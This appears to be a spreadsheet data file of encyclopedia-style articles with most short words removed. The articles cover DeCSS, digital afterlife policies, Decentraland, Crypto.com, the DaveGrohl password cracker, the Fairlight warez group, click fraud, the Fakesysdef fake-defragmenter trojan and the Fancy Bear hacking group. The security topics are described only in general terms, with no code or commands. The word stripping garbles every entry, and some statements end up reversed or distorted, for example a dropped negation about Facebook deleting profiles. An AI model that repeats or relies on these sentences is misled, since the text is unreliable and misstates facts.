implement wipo copyright treaty (such united states' digital millennium copyright act), devised clever ways distributing descriptions decss algorithm, steganography, various internet protocols, t-shirts dramatic readings, midi files, haiku poem (decss haiku), even so-called illegal prime number. also copy control association aacs encryption controversy illegal prime youtube-dl references further reading lawrence lessig, future ideas, 2001, 187–190, freely available archived august 2010 wayback machine. external links decss central information dvd, css, decss, livid, mpaa various lawsuits surrounding decss. archive information bunner pavlovich dvd-caa lawsuits 2600 news: industry takes 2600 court aftenposten: prosecutors dvd-jon's victory stand openlaw dvd/decss forum frequently asked questions (faq) list ways distribute decss decss explained technical overview decryption algorithm. decss.c, decss source code</t>
  </si>
  <si>
    <t>Death and the Internet</t>
  </si>
  <si>
    <t>recent extension cultural relationship death increasing number people created large amount digital content, social media profiles, remain death. this result concern confusion, automated features dormant accounts (e.g. birthday reminders), uncertainty deceased's preferences profiles deleted left memorial, whether information violate deceased's privacy (such email browser history) made accessible family. issues information sensitively dealt complicated belong service provider (not deceased) many clear policies happens accounts deceased users. while sites, including facebook twitter, policies related death, others remain dormant deleted inactivity transferred family friends. fada (fiduciary access digital assets act) place make possible transfer digital possessions legally.more broadly, heavy increase social media affecting cultural practices surrounding death. "virtual funerals" forms previously physical memorabilia introduced digital world, complete public details person's life death. e-mail gmail hotmail allow email accounts deceased accessed provided certain requirements met. yahoo! mail provide access, citing right survivorship non-transferability clause yahoo! terms service. 2005, yahoo! ordered probate court oakland county, michigan, release emails deceased marine justin ellsworth father, john ellsworth. website facebook policies early days, facebook used delete profiles dead people, anymore. october 2009, company introduced "memorial pages" response multiple user requests related 2007 virginia tech shooting. after receiving proof death special form, profile would converted tribute page minimal personal details, friends family members could share grief.in february 2015, facebook allowed users appoint friend family member "legacy contact" rights manage page death. also gave facebook users option account permanently deleted die.as january 2019, options active. controversies 2013, buzzfeed criticized facebook lack control memorialization resulted "facebook death" prank aimed locking users accounts.in 2017, reuters reported german court rejected mother's demand access deceased daughter's memorialized account stating right private telecommunications outweighed right inheritance. july 2018, dubai's difc courts ruling clarified facebook, twitter social media accounts bequeathed legally binding will.social media networks also criticized responding relatives' requests alter information memorialized accounts. another criticism facebook users often unaware content ultimately owned them, facebook. dropbox policies dropbox determines inactive accounts looking sign-ins, file shares, file activity previous months. once account determined inactive, dropbox deletes files account. request access account deceased person, heirs required send appropriate documents physical mail. google policies april 2013, google announced creation 'inactive account manager', allows users google services process ownership control inactive accounts transferred delegated user.google also allows users submit range requests regarding accounts belonging deceased users. google works immediate family members representatives close online accounts cases user known deceased, certain circumstances also provide content deceased user's account. twitter policies until 2010, twitter (launched july 2006) policy handling deceased user accounts, simply deleted timelines deceased users. august 2010, twitter allowed memorialization accounts upon request family members, also provided option either deleting account obtaining permanent backup deceased user's public tweets.in 2014, twitter updated policy include option delete deceased user photographs. this policy implemented multiple twitter trolls sent zelda williams, daughter robin williams, photoshopped images father.as january 2019, option twitter offered accounts dead people account deactivation. previously published content removed. deactivate account twitter requires immediate family member present copy death certificate deceased. twitter specified provide account access anyone, allow people account login information continue posting. prominent example roger ebert's account maintained wife chaz. controversies 2012, next columnist martin bryant noticed since twitter, unlike facebook, "one account real person" emphasis, memorializing accounts presented difficulty service. also criticized service lack control hacking accounts disapproved practice passing dead people's usernames owners certain period inactivity.in 2013, variety feature cory monteith's twitter account million followers moment death gained almost million followers afterwards. monteith's fans also launched #dontdeletecorystwitter campaign. january 2019, celebrity's account 1.64 million followers.various media reported awkward incidents related automatic posting account hacking. itunes policies icloud itunes accounts "non transferable" since content owned users licence access wikipedia users made least several hundred edits otherwise known substantial contributions wikipedia noted central memorial page. wikipedia user pages ordinarily fully edit-protected user died, prevent vandalism. youtube youtube grants access accounts deceased persons certain conditions. data options select give access trusted contact google's inactive account manager. digital inheritance digital inheritance process handing personal digital assets human beneficiaries. these digital assets include digital estates right them. include bank accounts, writings, photographs, social interactions. there several services store account passwords send selected individuals death. some periodically send customer email confirm person still alive; failure respond multiple emails, service provider assumes person died thereafter distribute passwords arranged. data inheritance function securesafe gives "activator code" customer transfers trusted individual, event death individual enters code secure safe's system access deceased person's digital inheritance. legacy locker safebeyond require persons confirm death, together presentation death certificate, passwords distributed.aimed concerned online privacy, platforms like lifebank store customer's internet account passwords offline ensuring trusted person given permission access stored passwords upon customer's death. july 2018, michigan court appeals found evernote document decedent typed phone shortly committing suicide enforceable valid will. also digital immortality digital preservation legacy.com online identity thanatosensitivity references further reading michael massimi; andrea charise (2009). "dying, death, mortality: towards thanatosensitivity hci". proc. 2009 extended abstracts, 2459–2468. retrieved 2012–02. silver, paul (2009-02). "death social media" paul silver's blog. retrieved 2010-04-20. wolf, nadine (2010-04). "the digital afterlife: happens social media die? part topics digital media spring 2010. retrieved 2010-04-20 jeffries, duncan september 2009). "preparing digital afterlife". guardian. retrieved june 2010. wilks, yorick (2010-10). "death internet" prospect magazine. el-hadi, nehal (2017. "death undone". inquiry.</t>
  </si>
  <si>
    <t>Decentraland</t>
  </si>
  <si>
    <t>decentraland virtual world browser-based platform. users virtual plots land platform nfts mana cryptocurrency, uses ethereum blockchain. opened public february 2020, overseen nonprofit decentraland foundation. history decentraland created argentinians meilich esteban ordano, development since 2015. when launched 2017, parcels digital land sold $20, mana tokens sold $0.02. game's first map, genesis city, made 90,601 parcels land. raised million initial coin offering (ico) 2017.in april 2021, surge popularity nfts, parcels sold $6,000 $100,000. because relatively small pool mana, currency volatile, spiking high $5.79 events like facebook's rebrand meta.in late 2021 early 2022, major brands apperared decentraland bought "properties" these include samsung, adidas, atari, pricewaterhousecoopers miller lite, sotheby's held first metaverse auction, march 2022, decentraland hosted metaverse fashion week major fashion brands appeared, including dolce gabbana, tommy hilfiger, elie saab, nicholas kirkwood, perry ellis, imitation christ, estée lauder. music artists including deadmau5 grimes held concerts platform. reception march 2020, luke winkie, writing gamer, described game "rickety", noting numerous bugs game's "brutally long loading times", well hard-locks related game's cryptocurrency-based authentication process. winkie described platform strongly libertarian political bent, saying "decentraland truly fascinating concept. peels back like onion, revealing randian fever-dream built roblox textures".according eric ravenscraft wired, activity platform unclear, world mostly empty number concurrent users around 1,600 2021, figure might include inactive users remain logged ravenscraft wrote decentraland buggy poor moderation. users minted nfts avatars slurs names point name "jew" sale $362,000. despite community voting favor adding "hitler" banned names list, enough votes decentralized autonomous organization's (dao) smart contract execute. ravenscraft also said game currently feels reminiscent early access game.in january 2022, video clip rave decentraland posted twitter alex moss. clip went viral widely mocked social media. zack zwiezen, writing kotaku, unfavorably compared clip similar virtual concerts parties adventurequest fortnite, roblox, chat, described look game similar fictional game tossed together hours episode csi: whatever city, investigators trying solve murder involves 'new' 'popular' online world." prompted clip, jason koebler vice investigated raves held platform, described experience mostly empty plagued technical bugs.in january 2022, zachariah kelly writing gizmodo, reviewed virtual version melbourne park created decentraland promote australian open. kelly praised models created project, well platform's ability browser, poor draw distance issues made feel "clunky" lacking activity. kelly also skeptical necessity blockchain nfts. kelly revisited decentraland's australian open space several days later, review closing concert. said experience plagued technical issues, footage event taken others unfavorably compared online concerts held platforms, fortnite. also metaverse non-fungible token (nft) virtual world blockchain references external links official website source code</t>
  </si>
  <si>
    <t>Decentraleyes</t>
  </si>
  <si>
    <t>decentraleyes free open-source browser extension used local content delivery network (cdn) emulation. primary task block connections major cdns cloudflare google (for privacy anti-tracking purposes), serve popular libraries (such jquery angularjs) locally users machine. decentraleyes available microsoft edge, mozilla firefox firefox esr, google chrome, pale moon opera browsers. overview decentraleyes bundled javascript libraries; angularjs, backbone.js, dojo, ember.js, core, jquery, jquery modernizr, mootools, prototype (including script.aculo.us), swfobject, underscore.js, font loader. locally redirect connections google hosted libraries, microsoft ajax cdn, cdnjs (cloudflare), jquery (maxcdn), jsdelivr (maxcdn), yandex cdn, baidu cdn, sina public resources, upyun libraries networks. with bundled resources software package, served user locally machine, opposed server. blocking connections cdns claimed result faster loading times user. reception lifehacker recommended decentraleyes solution help prevent user's data tracked google. cloudpro, uk-based cloud computing publication, endorsed decentraleyes blocking malicious man-in-the-middle attacks. history decentraleyes first released late 2015, compatible firefox browser.between 2016 2017, spinoff extension called localcdn created. brought functionality decentraleyes chromium based browsers, available time (until later year).in october 2017, decentraleyes 2.0.0 released. version rewritten scratch comply firefox browser add-on standards, consistent user interface better support right-to-left languages. references external links official website</t>
  </si>
  <si>
    <t>Crypto.com</t>
  </si>
  <si>
    <t>crypto.com cryptocurrency exchange company based singapore. 2022, company million customers 4,000 employees. platform's official cryptocurrency cronos. history company initially founded hong kong bobby bao, gary kris marszalek, rafael melo 2016 "monaco". 2018, company renamed crypto.com following purchase domain owned cryptography researcher professor matt blaze. domain sellers valued domain us$5–10 million.crypto.com operated foris asia, singapore-based company that's subsidiary foris (malta) limited.in january 2022, crypto.com victim hack totaling us$15 million stolen ether. after users reported suspicious activity accounts, company paused withdrawals. withdrawal services later restored alongside statement company customer funds lost.in august 2022, crypto.com acquired south korean startups payment service provider pnlink co., virtual asset service provider ok-bit co., ltd. sponsorships crypto.com sponsorship deals racing championship formula one, italian association football league serie promoter ufc, french football team paris saint-germain f.c., american basketball team philadelphia 76ers, canadian hockey team montreal canadiens, charity organization water.org. water.org partnership included signing co-founder, actor matt damon, serve crypto.com's brand ambassador.in november 2021, company acquired naming rights angeles's staples center, renaming crypto.com arena 20-year deal reported valued us$700 million.in march 2022, company became sponsor 2022 fifa world qatar. also binance kraken coinbase references</t>
  </si>
  <si>
    <t>DaveGrohl</t>
  </si>
  <si>
    <t>davegrohl brute-force password cracker macos. originally created 2010 password hash extractor since evolved standalone distributed password cracker. supports standard user password hashes (md4, sha-512 pbkdf2) used since lion also extract formatted popular password crackers like john ripper. latest stable release designed specifically lion mountain lion. attack methods davegrohl supports dictionary incremental attacks. dictionary attack scan number pre-defined wordlists incremental attack count character finds password. when distributed mode, uses bonjour find server nodes local network therefore requires configuration. also password cracking stretching aircrack-ng cain abel crack hashcat john ripper references external links official website cracking lion passwords</t>
  </si>
  <si>
    <t>FreeOTP</t>
  </si>
  <si>
    <t>freeotp free open-source software token used two-factor authentication. provides implementations hotp totp. tokens added scanning code manually entering token configuration. maintained apache license, supports android ios.freeotp plus (aka freeotp+) fork freeotp enhancements including exporting importing settings. both available f-droid software repository. also google authenticator linotp security token references external links official website</t>
  </si>
  <si>
    <t>E-Bullion</t>
  </si>
  <si>
    <t>e-bullion internet-based digital gold currency founded pamela fayed moorpark, california, part goldfinger coin bullion group companies. company incorporated 2000 launched july 2001. similar competing systems e-gold, e-bullion allowed instant transfer gold silver user accounts. e-bullion registered legal corporate entity panama. from 2001 2008 e-bullion grew million users substantial account transaction volume, reserves approximately 50,000 ounces gold bullion. company competitor e-gold.com goldmoney.com. 2008, co-founder, pamela fayed, murdered, leading indictment, trial conviction husband fayed hiring murder. fayed sentenced death, currently death california. result murder, u.s. government seized assets e-bullion, resulting closure company august 2008. features e-bullion simply provided users hold transfer balances gold silver. company also offered debit card u.s. customers, enabled convert bullion balances withdraw automated teller machine (atm) debit purchases. e-bullion provided in-house currency exchange service goldfinger coin bullion, inc. e-bullion account could funded directly wire transfer bank account. e-bullion first issue debit card linked account. e-bullion first cryptocard security tokens protect user accounts unauthorized access. goldfinger bullion reserve corporation, sister company e-bullion, held precious metals bullion storage vaults located angeles, perth mint australia. 2008 murder e-bullion principal fayeds troubled marriage eventually divorce proceedings. during divorce proceedings fayeds disputed partition ownership goldfinger companies, including e-bullion. monday july 2008 fayed's estranged wife pamela fayed stabbed death parking structure 1875 century park east century city, california. crime occurred 6:30pm daylight overheard numerous people responded victim's screams. surveillance camera recorded enough details rental identified license plate suspect description announced. appear several ongoing legal meetings divorce fayed reportedly attempting stop moving hiding joint assets involved e-bullion. august 2008 fayed united states federal custody facing felony charges conducting unlicensed money transactions e-bullion. federal authorities seized $60,000 cash, $24,000,000 gold bullion credit card allegedly used rental fled murder scene.fayed prosecuted capital murder, found guilty trial jury, sentenced death. currently imprisoned death california. e-bullion website taken august 2008. site simple mirror present wikipedia article. court papers filed james fayed part divorce proceedings indicate normal website operations would impossible without active oversight direction.after arrest fayed, attorney unsealed indictment e-bullion goldfinger coin bullion failure money transmitter license patriot act. although charges corporations eventually dropped, attorney's office seized assets goldfinger companies, including bullion backing e-bullion.com perth mint fayed's ranch california. e-bullion account holders compensated u.s. government confiscation bullion backing accounts. also digital currency exchanger paypal references external links former e-bullion official website internet archive copies e-bullion website. last version june 2008 indomitus report, 2004 status report free market money digital gold currency online magazine fool's gold (fbi)</t>
  </si>
  <si>
    <t>Computer Crime and Intellectual Property Section</t>
  </si>
  <si>
    <t>computer crime intellectual property section (ccips) section criminal division u.s. department justice charge investigating computer crime (hacking, viruses, worms) intellectual property crime. they additionally responsible prosecuting privacy invasions criminals hackers, cyberstalkers, purveyors mobile spyware, specializing search seizure digital evidence computers networks. ccips responsible for: prosecution infamous hackers albert gonzalez, hacking ring stole million debit credit card numbers infiltrating major payment processor retail networks across country, multi-nation effort disrupted "gameover zeus" botnet "cryptolocker" ransomware scheme connected indictment alleged russian cybercriminal evgeniy bogachev, obtaining conviction handed jersey jury case christopher rad, organized international securities fraud ring stock manipulation botnets, indictment dotcom, operated megaupload.com, website enabled large scale online copyright infringement digital piracy, working various u.s. attorney's offices across nation well number international partners prosecute "darknet market" websites hosted network. references</t>
  </si>
  <si>
    <t>Factotum (software)</t>
  </si>
  <si>
    <t>factotum password management authentication protocol negotiation virtual file system plan bell labs. when program wants authenticate service, requests factotum. factotum key, requests users either terminal window auth/fgui stored volatile memory. factotum authenticates service behalf program. long term storage, keys usually stored secstore encrypted file. also comparison password managers list password managers password manager cryptography external links factotum(4) plan programmer's manual, volume factotum(4) 9front. security plan plan programmer's manual, volume</t>
  </si>
  <si>
    <t>Fairlight (group)</t>
  </si>
  <si>
    <t>fairlight (flt) warez demo group initially involved commodore demoscene, cracking illegally release games free, since 1987. addition c64, fairlight also migrated towards amiga, super later fairlight founded easter holiday 1987 strider black shadow, ex-members west coast crackers (wcc). this "west coast" west coast sweden, fairlight initially swedish group, later became internationalized. name taken fairlight synthesizer strider jean-michel jarre records. beginning fairlight became known fast cracks. secret strider worked computer store latest games. bribed train conductor transport games malmö ronneby gollum cracked game sent back way. that could releases faster groups. operation fastlink several high-ranking members group caught april 2004, months group returned temporary "retirement" began june 2003 ended august operation called operation fastlink. police forces eleven countries involved, arresting people seizing computers (including servers). server u.s. raid contained 65,000 pirated titles alleged archive repository group.the operation coordinated fbi, british national hi-tech crime unit, german bundeskriminalamt (bka) business software alliance, took place u.s. states. seven computers seized three arrests made belfast, manchester sheffield. singapore, three people (22, years old) arrested. netherlands servers owned students universities investigated police officers. other arrests seizures made belgium, denmark, france, germany, hungary, israel, sweden total countries. according rumor, raid occurred warez group would released game hitman: contracts. game released groups (insomnia, xbox ps2, razor 1911, pcs) days later. shortly operation fastlink raids, council member [bacchus] writes: protections today ones *very* penetrate worthy respect. downloading fast matter fast line combination access site. skills stay, whereas access revoked instantly! last massive warez-related raid prior fastlink operation buccaneer targeted drinkordie (amongst others) december 2001. game since october 2006 division fairlight started releasing again. their game division started late 1998 2011, first group reach 1000 game releases. records fairlight short-lived collaboration trsi cooperative endeavor, trsi fairlight recordz, formed member zinkfloid (also known uyanik) raven fairlight. groups released several albums brand name "trsi fairlight recordz", including muffler (2000) cncd (1995). later lives 2012, magnus "pantaloon" sjöberg works lead software engineer digital illusions. pontus "bacchus" berg works telecom. fredrik "gollum" kahl professor mathematics lund university. "zike" carlbring professor clinical psychology stockholm university. tony "strider" krvaric emigrated united states 1992 chairman emeritus republican party diego county. also united software association pc-warez organization released cooperatively fairlight early 1990s. list warez groups references external links world fairlight (official website) history fairlight jazzcat "operation fastlink" press release published united states department justice fairlight (group entry scene database) fairlight's channel youtube</t>
  </si>
  <si>
    <t>Click fraud</t>
  </si>
  <si>
    <t>click fraud type fraud occurs internet pay-per-click (ppc) online advertising. type advertising, owners websites post paid based many site visitors click ads. fraud occurs person, automated script, computer program auto clicker imitates legitimate user browser, clicking without actual interest target ad's link order increase revenue. click fraud subject controversy increasing litigation advertising networks beneficiary fraud. media entrepreneur journalist john battelle describes click fraud intentionally malicious, "decidedly black hat" practice publishers gaming paid search advertising employing robots low-wage workers click sites repeatedly, thereby generating money paid advertiser publisher agent advertiser using. pay-per-click advertising advertising arrangement webmasters (operators websites), acting publishers, display clickable links advertisers exchange charge click. industry evolved, number advertising networks developed, acted middlemen groups (publishers advertisers). each time (believed valid user clicks advertiser pays advertising network, turn pays publisher share money. this revenue-sharing system seen incentive click fraud. largest advertising networks, google's adwords/adsense yahoo! search marketing, dual role, since also publishers search engines). according critics, complex relationship create conflict interest. this companies lose money undetected click fraud paying publisher make money collecting fees advertiser. because spread collect out, unfettered click fraud would create short-term profits companies. non-contracting parties secondary source click fraud non-contracting parties, part pay-per-click agreement. this type fraud even harder police, perpetrators generally cannot sued breach contract charged criminally fraud. examples non-contracting parties are: competitors advertisers: these parties wish harm competitor advertises market clicking ads. perpetrators profit directly force advertiser irrelevant clicks, thus weakening eliminating source competition. competitors publishers: these persons wish frame publisher. made look publisher clicking ads. advertising network terminate relationship. many publishers rely exclusively revenue advertising could business attack. other malicious intent: vandalism, many motives wishing cause harm either advertiser publisher, even people nothing gain financially. motives include political personal vendettas. these cases often hardest deal with, since difficult track culprit, found, little legal action taken them. friends publisher: sometimes upon learning publisher profits clicked, supporter publisher (like fan, family member, political party supporter, charity patron personal friend) click help. this considered patronage. however, backfire publisher (not friend) accused click fraud.advertising networks stop fraud parties often know clicks legitimate. unlike fraud committed publisher, difficult know past click fraud found. publishers resent refunds something fault. however, advertisers adamant phony clicks. organization click fraud simple person starting small site, becoming publisher ads, clicking generate revenue. often number clicks value small fraud goes undetected. publishers claim small amounts clicking accident, often case.much larger-scale fraud also occurs cybercrime communities. according jean-loup richet, professor sorbonne business school, click fraud frequently link large fraud chain, leveraged part larger identity fraud and/or attribution fraud. those engaged large-scale fraud often scripts simulate human clicking pages. however, huge numbers clicks appearing come one, small number computers, single geographic area, look highly suspicious advertising network advertisers. clicks coming computer known publisher also look suspicious watching click fraud. person attempting large-scale fraud, computer, stands good chance caught. type fraud circumvents detection based patterns uses existing user traffic, turning clicks impressions. such attack camouflaged users using 0-size iframes display advertisements programmatically retrieved using javascript. could also camouflaged advertisers portals ensuring so-called "reverse spiders" presented legitimate page, human visitors presented page commits click fraud. 0-size iframes techniques involving human visitors also combined incentivized traffic, members "paid read" (ptr) sites paid small amounts money (often fraction cent) visit website and/or click keywords search results, sometimes hundreds thousands times every some owners sites members engines send many email users search, sending not. they mainly charge click search results often source revenue site. this known forced searching, practice frowned upon paid industry. organized crime handle many computers internet connections different geographic locations. often, scripts fail mimic true human behavior, organized crime networks trojan code turn average person's machines zombie computers sporadic redirects cache poisoning turn oblivious user's actions actions generating revenue scammer. difficult advertisers, advertising networks, authorities pursue cases networks people spread around multiple countries. impression fraud falsely generated impressions affect advertiser's account. case click-through rate based auction models, advertiser penalized unacceptably click-through given keyword. this involves making numerous searches keyword without clicking such disabled automatically, enabling competitor's lower-bid keyword continue, several high bidders first page search results) eliminated. inflation attack inflation attack kind fraudulent method used advertisement publishers earn unjustified revenue traffic drive advertisers’ sites. sophisticated harder detect simple inflation attack. this process involves collaboration counterparts, dishonest publisher, dishonest site, pages contain script redirects customer site, process hidden customer. user retrieves page would simulate click request page site. site kinds webpages: manipulated version, original version. manipulated version simulates click request advertisement, causing credited click-through. selectively determines whether load manipulated (and thus fraudulent) script browser checking this done referrer field, specifies site link obtained. requests loaded manipulated script, thus automatic hidden request sent.this attack silently convert every innocent visit click advertisement page. even worse, collaboration several dishonest sites, collaboration several dishonest publishers. advertisement commissioner visits site non-fraudulent page displayed, thus cannot accused fraudulent. without reason suspecting collaboration exists, advertisement commissioner inspect internet sites detect attacks, infeasible.another proposed method detection type fraud association rules. manipulation organic search results major factor affects ranking websites organic search results (click-through rate). that ratio clicks impressions, words many times search result clicked compared number times listing appears search results. contrast fraud, competitor leverages services botnet, cost labour, generate false clicks, case objective adopt "beggar neighbour" policy competitors making rate possible, thereby diminishing position search results. actors therefore generate false clicks organic search results wish promote, avoiding search results wish demote. this technique effectively create cartel business services controlled actor, used promote certain political opinion etc. scale issue unknown, certainly evident many website developers close attention statistics webmaster tools. google search accused using called zero-click search prevent large part traffic leaving page third-party publishers. 2015 google introduced knowledge graph direct answers feature consist large main results page, information obtained third-party sources wikipedia, dictionaries, weather websites etc. result searches google search page. case specific query 890,000 searches google, 30,000 resulted user clicking results website. legal cases lawsuits disputes issue resulted number lawsuits. case, google (acting advertiser advertising network) lawsuit texas company called auction experts (acting publisher), google accused paying people click appeared auction experts' site, costing advertisers $50,000. despite networks' efforts stop publishers suspicious motives advertising networks, advertising network receives money click, even fraudulent. july 2005, yahoo settled class-action lawsuit plaintiffs alleging enough prevent click fraud. yahoo paid $4.5 million legal bills plaintiffs agreed settle advertiser claims dating back 2004 july 2006, google settled similar suit million. march 2006, google agreed million settlement fund class-action lawsuit filed lane's gifts collectibles. class-action lawsuit filed miller county, arkansas, dallas attorneys steve malouf, joel fineberg, dean gresham. expert witness plaintiffs case jessie stricchiola, internet search expert first identified instances fraud 2001. michael anthony bradley 2004, california resident michael anthony bradley created google clique, software program claimed could spammers defraud google millions dollars fraudulent clicks, ultimately arrest indictment.bradley able demonstrate fraud possible, impossible google detect. department justice alleged contacted google saying unless paid $100,000 rights technology, would sell spammers, costing google millions. result, bradley arrested extortion mail fraud 2006.charges dropped without explanation november 2006; attorney's office google declined comment. business week suggests google unwilling cooperate prosecution, would forced disclose click fraud detection techniques publicly. fabio gasperini june 2016, fabio gasperini, italian citizen, extradited united states click fraud charges. indictment charged gasperini with: counts computer intrusion count wire fraud count wire fraud conspiracy count money launderingaccording u.s. government, gasperini operated botnet 140,000 computers around world. this first click fraud trial united states. convicted counts, gasperini risked years jail. simone bertollini, italian-american lawyer, represented gasperini trial. august 2017 jury acquitted gasperini felony charges indictment. gasperini convicted misdemeanor count obtaining information without financial gain. gasperini sentenced statutory maximum year imprisonment, $100,000 fine, year supervised release following incarceration. shortly credited time served sent back italy. appeal currently pending. solutions proving click fraud difficult since hard know behind computer intentions are. when comes mobile fraud detection, data analysis give reliable indications. abnormal metrics hint presence different types frauds. detect click fraud campaign, advertisers focus following attribution points address: bots similar scripts server, click fraud mobile indicate high density clicks coming address range similar addresses. advertisers also check addresses verify history another fraud. click timestamp: click timestamp maintains time click made bot-based click fraud runs repeatedly attempt clicking ads, increases click frequency duration. high range clicks almost similar timestamp points possibility click fraud. duration high frequency mean high probability fraud. action timestamp: action timestamp time user takes action engages with) website. with bot-based click attack, similarity action timestamp. clicks advertisement performs action website without delay, advertiser notice almost action timestamp.often best advertising network identify clicks likely fraudulent charge account advertiser. even sophisticated means detection used, none foolproof. tuzhilin report produced part click fraud lawsuit settlement, detailed comprehensive discussion issues. particular, defines "the fundamental problem invalid (fraudulent) clicks": "there conceptual definition invalid clicks operationalized [except certain obviously clear cases]." operational definition cannot fully disclosed general public concerns unethical users take advantage lead massive click fraud. however, disclosed, advertisers cannot verify even dispute charged certain clicks."the industry lobbying tighter laws issue. many hope laws cover bound contracts. number companies developing viable solutions click fraud identification developing intermediary relationships advertising networks. such solutions fall categories: forensic analysis advertisers' server files.this analysis advertiser's server data requires in-depth look source behavior traffic. industry standard files used analysis, data verifiable advertising networks. problem approach relies honesty middlemen identifying fraud. third-party corroboration.third parties offer web-based solutions might involve placement single-pixel images javascript advertiser's pages suitable tagging ads. visitor presented cookie. visitor information collected third-party data store made available download. better offerings make easy highlight suspicious clicks, show reasons conclusion. since advertiser's files tampered with, accompaniment corroborating data third-party forms convincing body evidence present advertising network. however, problem third-party solutions solutions part traffic entire network. hence, less likely identify patterns span several advertisers. addition, limited amount traffic receive compared middlemen, overly less aggressive judging traffic fraud.in 2007 interview forbes, google click fraud czar shuman ghosemajumder said challenges click fraud detection third-parties access data beyond clicks, notably, impression data.click fraud less likely cost action models. research fact middlemen (search engines) upper hand operational definition invalid clicks reason conflict interest advertisers middlemen, described above. this manifested tuzhilin report described above. tuzhilin report publicly define invalid clicks describe operational definitions detail. rather, gave high-level picture fraud-detection system argued operational definition search engine investigations "reasonable". report preserve privacy fraud-detection system order maintain effectiveness. this prompted researchers conduct public research middlemen fight click fraud. since research presumably tainted market forces, hope research adopted assess rigorous middleman detecting click fraud future cases. fear research expose internal fraud-detection system middlemen still applies. example research done metwally, agrawal abbadi ucsb. other work majumdar, kulkarni, ravishankar riverside proposes protocols identification fraudulent behavior brokers intermediaries content-delivery networks. also references external links metwally, ahmed; agrawal, divyakant; abbadi, (2007). "detectives: detecting coalition inflation attacks advertising networks streams" (pdf). proceedings international conference. iw3c2. 241–250. metwally, ahmed; agrawal, divyakant; abbadi, (2005). "duplicate detection click streams" (pdf). proceedings international conference. iw3c2. 12–21. majumdar, saugat; kulkarni, dhananjay; ravishankar, chinya (2007). "addressing click fraud content delivery systems" (pdf). infocom. ieee. "truth advertising", economist, november 2006. "google cfo: fraud threat", money. retrieved december 2004. "how click fraud could swallow internet", wired magazine, issue 14.01 (january 2006). retrieved december 2005. simone soubusta: click fraud", retrieved march 2014. "click fraud uncovered fiverr advertisers willing click retrieved april 2015 "how google fighting click fraud" retrieved february 2019</t>
  </si>
  <si>
    <t>Fakesysdef</t>
  </si>
  <si>
    <t>trojan:win32/fakesysdef, originally dispersed application called "hdd defragmenter" hence name "fakesysdef" "fake system defragmenter", trojan targeting microsoft windows operating system first documented late 2010.win32/fakesysdef manifests array programs purport scan one's computer hardware failures related system memory, hard drives system functionality whole. they scan computer, show false hardware issues, present remedy defrag hard drives fine-tune system performance. they request user make payment order activate program user download updates repair hardware issues.the fictitious scanning program detects widespread varieties risks prevalent internet today. everyday numerous fake antivirus security applications published released unsuspecting end-users large assortment distribution channels. many times software turn clones developed code base packaged unique title design "skin".the branding strategy look legitimate computer users names usually combination technical words "hdd", "disk", "memory" action words "scanner", "defragmenter", "diagnostics", "repair", "fix". operation users encounter kind threat visit websites attempt convince remove non-existent malware security risks computers installing bogus software. trojan also installed malware, drive-by downloads, downloading installing software. users directed sites following methods: spam emails contain links attachments pornography sites blogs forums spammed links adult videos user-generated content spam (e.g. fake videos) malicious banner advertisements unauthorized software (‘warez’) search engine optimization (seo) poisoning fake torrents files shared networks pages containing exploitsthese programs intentionally misrepresent security status computer continually presenting fake scan dialog boxes alert messages prompt user product. programs often icon notification area operating system desktop constantly display pop-up messages alerting user fake security issues virus infections. these pop-up windows disappear user purchased product non-existent threats supposedly removed compromised computer. user decides purchase product, presented form within application redirected website requests credit card information. initial infection win32/fakesysdef installer arrive computer various file names. when run, installer drops injects file sometimes file) common processes, example "explorer.exe", "winlogon.exe", "wininet.exe". instances, main executable drops components. case, every windows restart injected "explorer.exe" "exe" component. ensure automatically runs every time windows starts, drops copy component using random file name %appdata% folder.win32/fakesysdef make widespread changes system including: modifying several internet explorer settings, enabling submitting non-encrypted form data, changing desktop wallpaper, displaying hiding shortcuts, hiding desktop start menu links, disabling windows task manager, disabling checking signatures downloaded programs, setting risk file types additionally, win32/fakesysdef variants terminate running processes installation block launched application computer restarts. during installation process, terminate running processes force computer restart. after restart, fakesysdef attempts block every launched program, display fake error messages offering problem. repeatedly restarts computer user agrees fake software. overwrites data hard drive/hard drive disk/hdd. symptoms win32/fakesysdef displays numerous false alerts indicating system errors displaying appearance scanning hard disk defragmenting prompts user, "fix errors" button, activate discovered errors. when "fix errors" button selected, fakesysdef pretends scan defragment hard disk. displays fake error messages, tells user needs purchase "advanced module" fix. user chooses browser opens. open custom browser user input card information software. removal detection anti-virus software makers responded threat fakesysdef adding checks products. simple removal software enabled sometimes enough reverse damage configuration files fakesysdef known edit. references</t>
  </si>
  <si>
    <t>Fancy Bear</t>
  </si>
  <si>
    <t>fancy bear (also known apt28 mandiant), pawn storm, sofacy group kaspersky), sednit, tsar team fireeye) strontium microsoft)) russian cyber espionage group. cybersecurity firm crowdstrike said medium level confidence associated russian military intelligence agency gru. uk's foreign commonwealth office well security firms secureworks, threatconnect, mandiant, also said group sponsored russian government. 2018, indictment united states special counsel identified fancy bear unit 26165.the name "fancy bear" comes coding system security researcher dmitri alperovitch uses identify hackers.likely operating since mid-2000s, fancy bear's methods consistent capabilities state actors. group targets government, military, security organizations, especially transcaucasian nato-aligned states. fancy bear thought responsible cyber attacks german parliament, norwegian parliament, french television station tv5monde, white house, nato, democratic national committee, organization security co-operation europe campaign french presidential candidate emmanuel macron.the group promotes political interests russian government, known hacking democratic national committee emails attempt influence outcome united states 2016 presidential elections. fancy bear classified fireeye advanced persistent threat. among things, uses zero-day exploits, spear phishing malware compromise targets. discovery security reports trend micro designated actors behind sofacy malware operation pawn storm october 2014. name group's "two connected tools/tactics attack specific target similar chess strategy," known pawn storm. network security firm fireeye released detailed report fancy bear october 2014. report designated group "advanced persistent threat (apt28) described hacking group used zero-day exploits microsoft windows operating system adobe flash. report found operational details indicating source "government sponsor based moscow". evidence collected fireeye suggested fancy bear's malware compiled primarily russian-language build environment occurred mainly work hours paralleling moscow's time zone. fireeye director threat intelligence laura galante referred group's activities "state espionage" said targets also include "media influencers."the name "fancy bear" derives coding system dmitri alperovitch's company crowdstrike uses hacker groups. "bear" indicates hackers russia. "fancy" refers "sofacy", word malware reminded analyst found iggy azalea's song "fancy". attacks fancy bear's targets included eastern european governments militaries, country georgia caucasus, ukraine, security-related organizations nato, well defense contractors academi (formerly known blackwater services), science applications international corporation (saic), boeing, lockheed martin, raytheon. fancy bear also attacked citizens russian federation political enemies kremlin, including former tycoon mikhail khodorkovsky, maria alekhina band pussy riot. secureworks, cybersecurity firm headquartered united states, concluded march 2015 2016, "fancy bear" target list included merely united states democratic national committee, tens thousands foes putin kremlin 